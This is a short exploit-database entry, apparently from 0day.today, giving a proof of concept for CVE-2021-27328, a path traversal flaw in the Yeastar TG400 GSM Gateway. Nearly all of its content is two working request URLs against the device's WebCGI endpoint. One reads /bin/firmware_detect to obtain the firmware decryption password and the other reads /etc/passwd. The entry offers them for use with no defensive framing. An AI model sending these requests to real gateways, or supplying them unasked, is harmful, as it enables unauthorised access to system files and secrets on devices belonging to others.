Lucene search

K
zdtZdt1337DAY-ID-35871
HistoryFeb 26, 2021 - 12:00 a.m.

Yeastar TG400 GSM Gateway 91.3.0.3 Path Traversal Vulnerability

2021-02-2600:00:00
0day.today
45

0.048 Low

EPSS

Percentile

92.8%

Path Traversal on Yeastar TG400 GSM Gateway - 91.3.0.3

This is a Proof of Concept for CVE-2021-27328
Example

    to get firmware decrypting password

http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect

    to get /etc/paswd

http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd

#  0day.today [2021-09-10]  #

0.048 Low

EPSS

Percentile

92.8%